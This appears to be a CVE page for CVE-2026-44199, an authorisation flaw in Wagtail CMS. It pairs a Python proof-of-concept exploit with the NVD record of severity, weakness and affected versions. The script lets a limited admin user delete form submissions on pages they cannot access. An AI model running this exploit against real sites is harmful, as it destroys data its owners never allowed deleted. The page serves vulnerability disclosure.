CVE-2026-44199

import requests # Configuration target_url = "http://example.com" login_url = f"{target_url}/admin/login/" delete_endpoint = f"{target_url}/admin/pages/<accessible_page_id>/submissions/delete/" username = "limited_user" password = "user_password" # The ID of the submission to delete (belonging to a restricted page) target_submission_id = 999 session = requests.Session() # 1. Authenticate to get session login_data = { "username": username, "password": password, "csrfmiddlewaretoken": "<get_from_login_page>", "next": "/admin/" } session.post(login_url, data=login_data) # 2. Craft the exploit payload # Attacker sends a request to delete submission ID 999 via a page they have access to payload = { "action": "delete", "selected_submission": target_submission_id, "csrfmiddlewaretoken": "<get_valid_token>" } # 3. Send the exploit request response = session.post(delete_endpoint, data=payload) if response.status_code == 200: print(f"[+] Successfully deleted submission ID: {target_submission_id}") else: print(f"[-] Exploit failed. Status: {response.status_code}")

{"cve": {"id": "CVE-2026-44199", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:35.430", "lastModified": "2026-05-12T15:58:28.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user with limited access to form pages could delete submissions to form pages they don't have access to by crafting a form submission to delete submissions on a page they do have access to for submissions they don't. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.7", "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1", "versionEndExcluding": "7.3.2", "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"}]}]}], "references": [{"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-pwm3-7fv4-g6xx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}